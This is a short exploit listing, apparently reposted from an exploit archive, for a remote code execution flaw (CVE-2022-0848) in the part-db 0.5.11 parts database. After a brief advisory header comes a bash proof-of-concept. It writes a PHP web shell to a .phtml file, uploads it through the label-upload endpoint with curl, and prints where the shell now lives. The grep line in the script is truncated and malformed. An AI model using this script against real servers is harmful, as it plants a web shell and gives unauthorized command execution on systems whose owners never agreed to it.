part-db 0.5.11 Remote Code Execution – Torchsec
- part-db 0.5.11 Remote Code Execution
- Posted Mar 7, 2022
- Authored by Sunny Mehra
-
part-db version 0.5.11 suffers from a remote code execution vulnerability.
- advisories | CVE-2022-0848
- MD5 |
0a4b599d9e4ab630547f878d967ae1f8 - Download | Favorite | View
# Exploit Title: part-db 0.5.11 - Remote Code Execution (RCE)
# Google Dork: NA
# Date: 03/04/2022
# Exploit Author: Sunny Mehra @DSKMehra
# Vendor Homepage: https://github.com/part-db/part-db
# Software Link: https://github.com/part-db/part-db
# Version: [ 0.5.11.]
# Tested on: [KALI OS]
# CVE : CVE-2022-0848
#
---------------#!/bin/bash
host=127.0.0.1/Part-DB-0.5.10 #WEBHOST
#Usage: Change host
#Command: bash exploit.sh
#EXPLOIT BY @DSKMehra
echo "< ?php system(id); ?>">POC.phtml #PHP Shell Code
result=`curl -i -s -X POST -F "logo_file=@POC.phtml" "http://$host/show_part_label.php" | grep -o -P '(?< =value="data/media/labels/).*(?=" >
echo Shell Location : "$host/data/media/labels/$result"
Gloss